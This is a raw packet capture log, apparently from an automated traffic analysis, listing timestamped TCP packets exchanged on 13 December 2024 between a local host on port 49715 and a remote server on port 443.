                                                Dec 13, 2024 08:50:39.483136892 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.484286070 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.484450102 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.484460115 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.484641075 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.485898018 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.486083984 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.486093998 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.486310005 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.487602949 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.487756968 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.487766981 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.487929106 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.489181995 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.489399910 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.489408970 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.489625931 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.490761042 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.490983963 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.490993023 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.491154909 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.492361069 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.492619038 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.492629051 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.492815018 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.493930101 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.494102955 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.494113922 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.494323969 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.495464087 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.495639086 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.495647907 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.495834112 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.497033119 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.497209072 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.497217894 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.497433901 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.498579025 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.498796940 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.498806000 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.499032021 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.500030994 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.500257015 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.500266075 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.500432014 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.501542091 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.501800060 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.501807928 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.502007961 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.503046989 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.503243923 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.503252983 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.503426075 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.504448891 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.504633904 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.504642010 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.504829884 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.505939007 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.506108046 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.506117105 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.506325006 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.507370949 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.507519960 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.507528067 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.507679939 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.508760929 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.508918047 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.508946896 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.509169102 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.510293961 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.510534048 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.510543108 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.510746956 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.511553049 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.511785030 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.511794090 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.511944056 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.512960911 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.513123989 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.513132095 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.513294935 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.514302015 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.514473915 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.514482021 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.514672995 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.515717983 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.515935898 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.515959978 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.516217947 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.516954899 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.517153978 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.517163038 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.517362118 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.518362999 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.518582106 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.518589973 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.518830061 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.519644976 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.519804001 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.519813061 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.520036936 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.520961046 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.521127939 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.521136999 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.521353006 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.522222996 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.522413015 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.522422075 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.522694111 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.523514986 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.523718119 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.523726940 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.524038076 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.524784088 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.524955034 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.524981022 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.525188923 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.526036978 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.526294947 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.526304007 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.526472092 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.527348995 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.527565002 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.527574062 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.527812958 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.528531075 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.528716087 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.528723955 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.528892994 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.529767990 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.529958963 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.529968023 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.530142069 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.530993938 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.531194925 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.531203032 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.531377077 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.532202005 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.532363892 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.532372952 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.532598019 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.533354044 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.533572912 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.533581972 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.533814907 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.534567118 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.534744024 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.534751892 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.534986019 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.535722971 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.535975933 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.535984993 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.536156893 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.536914110 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.537132978 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.537142038 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.537317991 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.538090944 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.538255930 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.538264990 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.538523912 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.539252996 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.539438963 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.539447069 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.539696932 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.540358067 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.540530920 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.540539980 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.540710926 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.541537046 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.541687012 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.541696072 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.541945934 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.542614937 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.542752028 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.542761087 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.542947054 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.543705940 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.543917894 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.543926954 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.544111013 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.544807911 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.544961929 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.544970989 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.545146942 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.545892000 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.546016932 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.546025038 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.546181917 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.546981096 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.547116041 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.547120094 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.547286034 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.548116922 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.548289061 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.548296928 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.548501015 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.549160004 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.549345016 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.549354076 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.549520969 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.550276041 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.550520897 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.550529957 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.550770998 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.551359892 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.551538944 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.551548004 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.551722050 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.552472115 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.552722931 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.552731037 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.552920103 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.553554058 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.553725958 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.553734064 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.553920984 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.554511070 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.554759979 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.554769039 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.554946899 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.555577040 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.555779934 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.555788994 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.555947065 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.556557894 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.556765079 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.556773901 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.556919098 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.557576895 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.557774067 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.557782888 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.557955027 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.558557034 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.558780909 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.558789015 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.558999062 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.559534073 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.559715033 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.559724092 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.559895039 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.560539007 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.560688019 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.560692072 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.560861111 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.561528921 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.561713934 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.561718941 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.561928988 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.562457085 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.562719107 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.562727928 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.562901020 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.563396931 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.563596010 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.563604116 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.563786030 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.564388990 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.564620018 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.564629078 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.564812899 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.565360069 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.565618992 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.565627098 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.565813065 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.566303968 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.566618919 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.566627979 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.566801071 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.567249060 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.567423105 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.567431927 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.567672014 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.568214893 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.568447113 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.568455935 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.568645000 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.569098949 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.569238901 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.569247007 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.569462061 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.570046902 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.570242882 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.570247889 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.570440054 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.570988894 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.571173906 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.571182013 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.571403027 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.571917057 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.572096109 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.572104931 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.572313070 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.572861910 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.573122978 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.573132038 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.573327065 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.573771954 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.573931932 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.573940992 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.574100971 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.574708939 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.574861050 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.574870110 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.575001955 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.575612068 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.575836897 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.575845957 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.575989008 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.576608896 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.576811075 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.576819897 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.577029943 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.577466965 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.577656984 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.577665091 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.577852011 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.578392029 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.578593016 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.578602076 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.578788042 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.579255104 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.579449892 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.579458952 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.579684973 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.580216885 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.580410004 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.580419064 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.580634117 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.581114054 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.581362009 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.581370115 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.581547976 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.582025051 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.582235098 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.582243919 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.582426071 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.582979918 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.583168983 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.583178043 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.583374023 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.583827019 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.584027052 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.584036112 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.584264994 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.584729910 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.584909916 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.584918976 CET44349715108.177.122.132192.168.11.20
